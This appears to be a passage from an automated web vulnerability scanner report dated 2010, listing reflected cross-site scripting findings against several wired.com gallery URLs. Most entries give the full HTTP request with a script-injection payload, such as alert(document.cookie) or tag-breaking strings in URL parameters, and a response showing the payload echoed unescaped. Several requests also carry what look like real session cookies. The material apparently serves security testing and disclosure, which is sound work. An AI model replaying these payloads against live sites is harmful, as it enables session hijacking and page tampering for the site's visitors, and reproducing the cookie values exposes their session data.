Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:18 GMT
Date: Sun, 21 Nov 2010 23:07:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia">
...[SNIP]...

1.60. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86">
...[SNIP]...

1.61. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/>"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=114661<script>alert(1)</script>f716d04df3f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=114661<script>alert(1)</script>f716d04df3f', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.62. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src=2ca4a"><script>alert(1)</script>649eec63546 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40635


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=2ca4a"><script>alert(1)</script>649eec63546', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.63. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia">
...[SNIP]...

1.64. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:49 GMT
Date: Sun, 21 Nov 2010 19:58:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia">
...[SNIP]...

1.65. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:09:36 GMT
Date: Sun, 21 Nov 2010 19:59:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia85426"><a>aac868d772e">
...[SNIP]...

1.66. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:33:21 GMT
Date: Sun, 21 Nov 2010 20:23:21 GMT
Connection: close
Content-Length: 40715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.67. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

parameter]
 previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1>=121969<script>alert(1)</script>01760d30d83 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:50:58 GMT
Date: Sun, 21 Nov 2010 20:40:58 GMT
Connection: close
Content-Length: 40738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=121969<script>alert(1)</script>01760d30d83', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.68. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src=6981a><script>alert(1)</script>03dc29fdb27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:00 GMT
Date: Sun, 21 Nov 2010 20:41:00 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=6981a><script>alert(1)</script>03dc29fdb27', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.69. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=1d1198<script>alert(1)</script>39b53ac696 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:01 GMT
Date: Sun, 21 Nov 2010 20:41:01 GMT
Connection: close
Content-Length: 40821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=1d1198<script>alert(1)</script>39b53ac696', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.70. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:05 GMT
Date: Sun, 21 Nov 2010 20:24:05 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.71. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:07 GMT
Date: Sun, 21 Nov 2010 20:24:07 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.72. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:35:32 GMT
Date: Sun, 21 Nov 2010 20:25:32 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.73. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
